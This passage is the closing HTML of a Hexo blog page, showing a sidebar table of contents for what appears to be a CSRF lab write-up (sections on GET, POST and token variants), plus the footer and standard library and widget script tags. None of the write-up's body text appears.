          Impossible</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Pikachu"><span class="toc-number">11.</span> <span class="toc-text">
          Pikachu</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF-GET"><span class="toc-number">12.</span> <span class="toc-text">
          CSRF(GET)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF-POST"><span class="toc-number">13.</span> <span class="toc-text">
          CSRF(POST)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSRF-Token"><span class="toc-number">14.</span> <span class="toc-text">
          CSRF(Token)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-number">15.</span> <span class="toc-text">
          后记</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/usually.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">hey</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">115</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2025</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>hey</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.2</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.7.0</span></div><div class="busuanzi"><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">Views</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script><script src="/js/utils.js?v=2.7.0"></script><script src="/js/stun-boot.js?v=2.7.0"></script><script src="/js/scroll.js?v=2.7.0"></script><script src="/js/header.js?v=2.7.0"></script><script src="/js/sidebar.js?v=2.7.0"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":180,"height":300},"mobile":{"show":true},"log":false});</script></body></html>